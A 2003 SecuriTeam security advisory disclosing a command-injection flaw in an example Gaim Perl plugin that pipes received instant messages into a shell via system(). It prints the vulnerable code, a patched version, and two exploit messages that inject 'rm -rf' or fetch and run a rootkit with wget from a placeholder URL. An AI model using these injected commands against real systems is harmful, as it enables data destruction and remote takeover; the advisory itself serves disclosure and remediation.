[UNIX] Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/15/03

  • Next message: SecuriTeam: "[NT] Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (MS03-045)" 
    To: list@securiteam.com
Date: 15 Oct 2003 19:05:46 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Gaim Festival Example Plugin Command Execution Vulnerability (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <http://sourceforge.net/projects/gaim/> Gaim is an all-in-one IM client
    that resembles AIM. Gaim lets you use AIM, ICQ, Yahoo, MSN, IRC, Jabber,
    Napster, Zephyr, and Gadu-Gadu, all at once. Gaim is NOT endorsed by or
    affiliated with AOL, Yahoo, MSN, or Napster. An example plugin provided by
    (which many copy-paste from) allows remote attackers to cause it to
    execute arbitrary code.

    DETAILS

    A vulnerability exists in any plugin that has copied its code from the
    example plugin to execute arbitrary code.

    Vulnerable code (from the example plugin):
    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    As taken from:
     <http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl>
    http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl

    As you can see the system command is executed without adequate attention
    to the user provided input.

    Exploit:
    Just pass the plugin any of these messages (or really any message for that
    matter):
    Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
    Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
    rootkit;./rootkit

    Solution:
    A fixed version of the example plugin would look like this:
    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        $string =~ s/[^\w]//g;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:error@lostinthenoise.net>
    error.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Buffer Overrun in the ListBox and in the ComboBox Control Could Allow Code Execution (MS03-045)"

    Relevant Pages